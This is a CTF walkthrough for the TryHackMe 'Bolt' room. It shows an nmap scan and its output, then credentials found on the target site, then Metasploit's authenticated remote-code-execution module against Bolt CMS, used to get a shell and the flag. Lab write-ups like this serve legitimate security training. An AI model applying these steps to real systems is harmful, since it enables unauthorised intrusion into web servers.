Tryhackme Bolt Writeup
4 min readJul 10, 2021
Task1:Deploy the machine and obtain IP
Task2:Hack Your Way into the machine
Begin enumerating the machine by doing an nmap scan to identify open ports.i.e
sudo nmap -A -T4 -sV -sC -p- --open -oA bolt_full_scan 10.10.54.222
[sudo] password for ellell:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 15:13 EAT
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 15:14 (0:00:12 remaining)
Nmap scan report for 10.10.54.222
Host is up (0.18s latency).
Not shown: 65514 closed ports, 18 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open http (PHP 7.2.32-1)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Sat, 10 Jul 2021 12:13:02 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Sat, 10 Jul 2021 12:13:02 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: f56699
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| </head>
| <body>
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Sat, 10 Jul 2021 12:13:01 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Sat, 10 Jul 2021 12:13:01 GMT
| Content-Type: text/html; charset=UTF-8
| X-Debug-Token: cba7fd
| <!doctype html>
| <html lang="en-GB">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| <link rel="canonical" href="http://0.0.0.0:8000/">
| </head>
|_ <body class="front">
|_http-generator: Bolt
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Bolt | A hero is unleashed```
-Open ports -22,80,8000
- Browse to http://machineIP/ -default apache web page
- Browsing to http://machineIP:8000/ we obtain a we a different web page and using an the wappalyzer extention we identify the cms to be bolt cms.Further this can be confirmed in the footer section.
- There are two messages in this home page.The message from admin reveals the admins username to be bolt
- The other message for IT Department reveals the username’s password
- On the websites home page there are two messages from admin dated 18th July 2020.Googling Bolt cms releases 2020 confirms from github https://github.com/bolt/bolt/releases the build to be 3.7.1
- Searching for bolt cms 3.7.0 (previous version)exploits reveals an authencticated remote code execution which is perfect as we have a username and password. more details are https://www.rapid7.com/db/modules/exploit/unix/webapp/bolt_authenticated_rce/, https://www.exploit-db.com/exploits/48296 -This will display the EDB-ID of the exploit at 48296.
- Boot up metasploit using msfconsole -q
- search bolt
- use the
use exploit/unix/webapp/bolt_authenticated_rceoptions - show options
- set LHOST,set RHOSTS,set USERNAME,set Password as shown below replacing the LHOST and RHOST with your tun0 and Remote machine IPs.
- type check to confirm if rhosts is vulnerable
- type exploit
- Obtain a shell and navigate to /home directory to obtain flag.
Thank you for reading my article!!